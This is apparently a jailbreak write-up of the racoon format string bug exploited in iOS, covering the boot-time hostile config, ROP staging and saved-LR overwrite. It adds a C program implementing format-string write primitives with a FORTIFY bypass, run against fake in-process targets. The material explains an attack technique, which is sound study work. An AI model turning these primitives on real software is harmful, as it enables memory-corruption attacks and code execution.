Racoon String Format Overflow Exploit
Using a fuzzer, a format string vulnerability was found in the configuration file parsing code of racoon, the IPsec IKE daemon from ipsec-tools (http://ipsec-tools.sourceforge.net/). racoon ships with iOS by default and is started whenever an IPsec VPN connection is set up.
The way the format string bug is exploited here differs from the classic format string technique described in 2001.
So that the jailbreak is re-applied at every boot, racoon is started by a launchd plist that runs the command: racoon -f racoon-exploit.conf
racoon-exploit.conf is a large configuration file that exploits the format string bug to get unsigned code running.
The format string bug is used to copy a ROP bootstrap payload into memory and then to start it, by overwriting a saved LR on racoon's stack with the address of a stack pivot gadget.
The ROP bootstrap payload copies the ROP exploit payload from the payload file distributed with Corona and then pivots the stack to it. The two-stage design exists to get out of format string processing as quickly as possible: every value written through a format string has to be "printed" as that many characters of padding first, so format string writes are expensive in CPU time.
The ROP exploit payload triggers the kernel exploit (see HFS Heap Overflow).
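The following C program is an added example, not part of this page and not pod2g's racoon-exploit.conf. It builds format strings the way a hostile config value would and executes them in-process against fake targets, reproducing the two writes the text describes: staging a payload into memory half-word by half-word, and overwriting a saved return address slot with a gadget address. It assumes a simplified setting: the target pointers are handed to the format call as arguments instead of being fetched from the stack with %N$, padding is produced with "%.Ns" over a filler string rather than whatever conversion the real config used, every value is written as 16-bit halves with %hn, and the formatted output is discarded. The names run_fmt, fmt_write16, fmt_write16x2, fmt_copy, fmt_write_ptr and pad are the example's own.

```c
/* Added example (not from the page or pod2g's exploit): format-string write
 * primitives of the kind the page describes, built as attacker data and run
 * in-process against fake targets. Assumptions: target pointers are passed as
 * the varargs (a real exploit reaches them on the stack with %N$), padding
 * comes from "%.Ns" over a filler string, output is thrown away. */
#undef _FORTIFY_SOURCE   /* glibc's __vsnprintf_chk aborts on %n in a writable format */
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Call libc's real vsnprintf through a pointer so the fortified inline
 * wrapper cannot be substituted even if stdio.h was already fortified. */
static int (*const raw_vsnprintf)(char *, size_t, const char *, va_list) = vsnprintf;

/* 64 KiB of filler: "%.Ns" of it prints exactly N characters (N <= 65535). */
static char pad[65536];
static void pad_init(void)
{
    if (pad[0] != 'A') {
        memset(pad, 'A', sizeof pad - 1);
        pad[sizeof pad - 1] = '\0';
    }
}

/* Run an attacker-controlled format the way a vulnerable daemon would.
 * The buffer is NULL/0 so nothing is stored, but %n still records how many
 * characters *would* have been printed: the padding is paid in CPU time
 * either way. Returns that character count. */
static int run_fmt(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = raw_vsnprintf(NULL, 0, fmt, ap);
    va_end(ap);
    return n;
}

/* Write one 16-bit value: print exactly v characters, then %hn stores the
 * running count (v) at p. Cost: v characters. */
static int fmt_write16(uint16_t *p, uint16_t v)
{
    char fmt[32];
    pad_init();
    snprintf(fmt, sizeof fmt, "%%.%us%%hn", (unsigned)v);   /* e.g. "%.4096s%hn" */
    return run_fmt(fmt, pad, p);
}

/* Write two 16-bit values in one format string. %hn stores the running
 * total, so the smaller value goes first and the second pad is only the
 * difference. Cost: max(a, b) characters instead of a + b. */
static int fmt_write16x2(uint16_t *pa, uint16_t a, uint16_t *pb, uint16_t b)
{
    char fmt[64];
    pad_init();
    if (a > b) {
        uint16_t *tp = pa; pa = pb; pb = tp;
        uint16_t tv = a;  a = b;   b = tv;
    }
    snprintf(fmt, sizeof fmt, "%%.%us%%hn%%.%us%%hn", (unsigned)a, (unsigned)(b - a));
    return run_fmt(fmt, pad, pa, pad, pb);
}

/* "Copy the ROP bootstrap payload to memory": stage len bytes (len even,
 * dst 2-byte aligned) into dst, one half-word per %hn. Returns the total
 * number of characters printed, or -1 on bad input. One %n per 32-bit word
 * would instead cost up to 4,294,967,295 characters per word. */
static long fmt_copy(void *dst, const void *src, size_t len)
{
    if (len % 2) return -1;
    uint8_t *d = dst;
    const uint8_t *s = src;
    long cost = 0;
    size_t i = 0;
    for (; i + 4 <= len; i += 4) {
        uint16_t a, b;
        memcpy(&a, s + i, 2);
        memcpy(&b, s + i + 2, 2);
        cost += fmt_write16x2((uint16_t *)(d + i), a, (uint16_t *)(d + i + 2), b);
    }
    if (i < len) {
        uint16_t a;
        memcpy(&a, s + i, 2);
        cost += fmt_write16((uint16_t *)(d + i), a);
    }
    return cost;
}

/* "Overwrite a saved LR with a stack pivot gadget": a code pointer is just
 * sizeof(void *) / 2 half-words written the same way into the saved slot. */
static long fmt_write_ptr(void **slot, void *gadget)
{
    uintptr_t v = (uintptr_t)gadget;
    return fmt_copy(slot, &v, sizeof v);
}
```

The cost figures returned by fmt_copy are the point of the exercise: a 32-bit word written as two %hn halves costs at most 65535 printed characters, while writing it with a single %n costs as many characters as the value itself, which is why the bootstrap stage hands off to a ROP payload that is copied by normal code rather than by more format strings. The #undef and function-pointer detour are needed because glibc's fortified printf variants abort on %n in a writable format string, and newer Apple libcs added a similar check; the libc in iOS 5.0.1 had no such protection.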
Credit
- pod2g for finding this vulnerability and writing a working exploit